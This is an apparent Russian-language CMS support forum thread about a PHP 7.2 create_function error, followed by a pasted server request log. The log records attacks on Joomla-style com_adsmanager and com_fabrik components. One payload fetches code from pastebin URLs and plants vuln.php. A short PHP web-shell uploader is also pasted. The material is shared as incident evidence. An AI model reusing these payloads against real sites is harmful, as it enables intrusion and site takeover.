по первому вопросу - понятно, буду искать.
По второму.
Заработало! УРААА!!
Спасибо.
По второму.
Заработало! УРААА!!
Спасибо.
nabster, проблема связана с новой версией PHP 7.2, функция create_function больше не будет поддерживаться. Эта функция объявлена устаревшей, начиная с PHP 7.2.0.
Решением является переход на более раннюю версию PHP 7.0 или 7.1.
В следующей версии CMS это проблем будет решена.
# Format admin variable $admin = isset($_SESSION[$conf['admin_c']]) ? explode(':', addslashes(base64_decode($_SESSION[$conf['admin_c']]))) : false;
unset($_SESSION[$conf['admin_c']]); $info = base64_encode($aid.":".$aname.":".$apwd.":".$aeditor); $_SESSION[$conf['admin_c']] = $info; $ip = getip(); $db->sql_query("DELETE FROM ".$prefix."_session WHERE uname = '".$ip."'"); $db->sql_query("UPDATE ".$prefix."_admins SET ip = '".$ip."', lastvisit = now() WHERE id = '".$aid."'"); login_report(1, 1, $name, ""); header("Location: ".$admin_file.".php");
Дата: 10.03.2019 23:16:38 --- POST: Array ( [--ae648f3cef84cec7a96b8786b6906ba7 Content-Disposition:_form-data;_name] => \"name\" vuln.php --ae648f3cef84cec7a96b8786b6906ba7 Content-Disposition: form-data; name=\"file\"; filename=\"index.jpg\" <title>Vuln!! patch it Now!</title> <?php function http_get($url){ $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } $check = $_SERVER[\'DOCUMENT_ROOT\'] . \"/images/vuln.php\" ; $text = http_get(\'https://pastebin.com/raw/phAM8DFH\'); $open = fopen($check, \'w\'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check.\"</br>\"; }else echo \"not exits\"; echo \"done .\\n \" ; $check2 = $_SERVER[\'DOCUMENT_ROOT\'] . \"/vuln.htm\" ; $text2 = http_get(\'https://pastebin.com/raw/880ufaWF\'); $open2 = fopen($check2, \'w\'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2.\"</br>\"; }else echo \"not exits\"; echo \"done .\\n \" ; @unlink(__FILE__); ?> --ae648f3cef84cec7a96b8786b6906ba7-- ) GET: Array ( [option] => com_adsmanager [task] => upload [tmpl] => component ) ------------------ Дата: 10.03.2019 23:16:59 --- POST: Array ( [--a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition:_form-data;_name] => \"option\" com_fabrik --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"field_delimiter\" , --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"text_delimiter\" [quot; --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition:_form-data;_name] => \"controller\" import --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"tableid\" 0 --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"overwrite\" 1 --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"Itemid\" 0 --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"task\" doimport --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"name\" me.php --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"drop_data\" 1 --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"view\" import --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"userfile\"; filename=\"files/vuln.txt\" Content-Type: multipart/form-data Vuln!! patch it Now! --a3d990fbfa374c2346d298493ee4d6c1-- )
<title>Vuln!! patch it Now!</title> echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; } else { echo '<b>Not uploaded ! </b><br><br>'; } }
Форум
Контакты